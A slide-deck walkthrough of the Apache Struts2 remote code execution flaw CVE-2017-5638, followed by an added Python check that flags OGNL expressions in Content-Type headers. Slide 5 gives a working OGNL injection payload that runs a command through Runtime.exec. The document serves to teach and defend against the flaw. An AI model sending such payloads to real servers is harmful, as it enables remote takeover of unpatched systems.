Apache Struts2 CVE-2017-5638

A quick walkthrough and demo of the Apache Struts2 RCE CVE-2017-5638

  1. CVE-2017-5638 Apache Struts2 Remote Code Execution
  2. about me
     • Riyaz Walikar
     • Chief Hacker @ Appsecco
     • null Bangalore & OWASP Bangalore chapter leader
     • @riyazwalikar
     • @wincmdfu
     • http://ibreak.software
  3. The vulnerability
     • Nike Zheng reported a Remote Code Execution vulnerability in Apache Struts2 (CVE-2017-5638)
     • A bug in the Jakarta Multipart parser used by Apache Struts2 allows remote code execution when a crafted Content-Type header is sent in the request.
     • Apache Struts2 is a web framework based on the MVC design paradigm.
  4. GET /struts-app HTTP/1.1
     Host: 127.0.0.1:8080
     User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Referer: http://127.0.0.1:8080/
     Connection: close
     Content-Type: multipart/form-data
  5. Content-Type: %{
       (#_='multipart/form-data').
       (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
       (@java.lang.Runtime@getRuntime().exec('calc'))
     }
  6. The parse method in the org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest class
  7. findText > getDefaultMessage > TextParseUtil.translateVariables > evaluate method, which evaluates the OGNL expression in the payload
     • OGNL: Object Graph Navigation Language
  8. demo
  9. Reference:
     • https://www.immun.io/blog/will-it-pwn-cve-2017-5638-remote-code-execution-in-apache-struts-2
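
The contrast between slides 4 and 5 can be turned into a request-side check. The following is an added example, not code from the slides or from Apache Struts: it validates the Content-Type value against the HTTP media-type grammar and flags an OGNL expression opener. The function names and sample requests are constructed for illustration, and the crafted sample is a defanged version of slide 5.

```python
import re

# RFC 7230 "token" characters; "{", "}", "(" and ")" are not tokens.
TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
MEDIA_TYPE = re.compile(
    rf'{TOKEN}/{TOKEN}(?:[ \t]*;[ \t]*{TOKEN}=(?:{TOKEN}|"[^"\\]*"))*[ \t]*'
)
OGNL_OPEN = re.compile(r"[%$]\{")  # heuristic: start of an OGNL expression

# Constructed sample requests (not captured traffic). CRAFTED keeps the
# shape of slide 5 but contains no command execution.
BENIGN = ("POST /struts-app HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n"
          "Content-Type: multipart/form-data; boundary=----x1\r\n\r\n")
CRAFTED = ("GET /struts-app HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n"
           "content-type: %{(#_='multipart/form-data')}\r\n\r\n")
BROKEN = ("POST /struts-app HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n"
          "Content-Type: text/html,,\r\n\r\n")


def content_types(raw_request):
    """Return every Content-Type value in a raw HTTP request head."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    values = []
    for line in head.split("\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "content-type":  # case-insensitive
            values.append(value.strip())
    return values


def naive_is_multipart(value):
    """Substring test: true for the crafted header as well as a real one."""
    return "multipart/form-data" in value


def classify(raw_request):
    """Return 'ok', 'malformed' or 'ognl' for the request's Content-Type."""
    verdict = "ok"
    for value in content_types(raw_request):
        if OGNL_OPEN.search(value):
            return "ognl"
        if not MEDIA_TYPE.fullmatch(value):
            verdict = "malformed"
    return verdict


if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("crafted", CRAFTED), ("broken", BROKEN)):
        print(label, classify(req))
```

The substring test accepts the crafted value because the expression embeds the string 'multipart/form-data', while the grammar check rejects it regardless of the HTTP method used.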
